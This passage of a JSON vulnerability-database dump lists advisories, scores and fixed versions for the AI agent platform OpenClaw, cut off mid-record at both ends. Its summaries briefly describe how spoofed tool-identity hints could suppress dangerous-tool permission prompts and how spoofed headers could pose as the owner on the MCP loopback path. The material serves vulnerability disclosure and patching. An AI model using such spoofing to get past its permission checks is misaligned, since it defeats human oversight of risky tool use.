g_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44995","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_syst
em":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44995"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables"},{"reference_url":"https://github.com/advisories/GHSA-mj59-h3q9-ghfh","reference_id":"GHSA-mj59-h3q9-ghfh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mj59-h3q9-ghfh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-449
95","GHSA-mj59-h3q9-ghfh"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rr6t-1193-ybgz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91642?format=json","vulnerability_id":"VCID-rswr-nd6z-vuhe","summary":"OpenClaw's Conflicting Tool Identity Hints Bypass Dangerous-Tool Prompting\n## Summary\nACP permission resolution trusted conflicting tool identity hints from rawInput and metadata, which could suppress dangerous-tool prompting.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `e4c61723cd2d530680cc61789311d464ab8cdf60`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/acp/client.ts now fails closed when meta, rawInput, and title tool identities conflict instead of trusting spoofable raw input.\n- src/acp/client.test.ts ships regressions for conflicting tool identity hints and dangerous-tool prompting.\n\nOpenClaw thanks @zpbrent for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35655","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14671","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14635","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14677","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35655"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scor
ing_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35655","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35655"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/
SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution"},{"reference_url":"https://github.com/advisories/GHSA-74wf-h43j-vvmj","reference_id":"GHSA-74wf-h43j-vvmj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-74wf-h43j-vvmj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerabili
ty":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerabili
ty":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerabili
ty":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerabili
ty":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35655","GHSA-74wf-h43j-vvmj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rswr-nd6z-vuhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91952?format=json",
"vulnerability_id":"VCID-ry1r-br3q-2uaw","summary":"OpenClaw: MCP loopback owner context is derived from server-issued bearer tokens\n## Summary\nMCP loopback owner context is derived from server-issued bearer tokens.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe loopback MCP path accepted spoofable owner-context metadata from request headers, which could allow a non-owner loopback client to present itself as owner for owner-gated operations.\n\n## Fix\nThe MCP loopback runtime now issues separate owner and non-owner bearer tokens and derives senderIsOwner exclusively from which token authenticated the request. The spoofable sender-owner header is no longer emitted or trusted.\n\n## Fix Commit(s)\n- 3cb1a56bfc9579a0f2336f9cfa12a8a744332a19\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @VladimirEliTokarev for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44118","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01838","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01843","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02646","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44118"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elemen
ts":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44118","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44118"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header"},{"reference_url":"https://github.com/advisories/GHSA-r6xh-pqhr-v4xh","reference_id":"GHSA-r6xh-pqhr-v4xh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6xh-pqhr-v4xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnera
ble":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44118","GHSA-r6xh-pqhr-v4xh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ry1r-br3q-2uaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89294?format=json","vulnerability_id":"VCID-s3wz-3yzf-ybhz","summary":"OpenClaw: Voice-call Plivo replay mutates in-process callback origin before replay rejection\n## Summary\nVoice-call Plivo replay mutates in-process callback origin before replay rejection\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 can still mutate Plivo callback origin before replay rejection, but this needs a captured valid callback for a live call so medium is overstated.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b` — 2026-03-31T19:50:35+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for 
